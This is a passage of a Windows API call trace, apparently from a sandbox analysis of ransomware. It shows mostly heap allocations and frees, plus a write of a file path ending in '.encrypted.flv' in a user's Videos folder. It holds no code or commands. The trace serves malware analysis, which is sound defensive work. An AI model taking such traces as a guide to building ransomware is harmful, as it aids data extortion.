out: lpNewFilePointer=0x0) returned 1 [0043.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.encrypted.flv\r\n", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0043.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4f) returned 0x7f36e0 [0043.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.encrypted.flv\r\n", cchWideChar=79, lpMultiByteStr=0x7f36e0, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.encrypted.flv\r\n", lpUsedDefaultChar=0x0) returned 79 [0043.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0043.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0043.115] WriteFile (in: hFile=0x140, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x4e, lpOverlapped=0x0) returned 1 [0043.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0043.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.115] CloseHandle (hObject=0x140) returned 1 [0043.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.118] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.118] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.119] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0043.119] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.119] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.119] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af408 [0043.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c880 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.120] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.122] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.124] RtlAllocateHeap 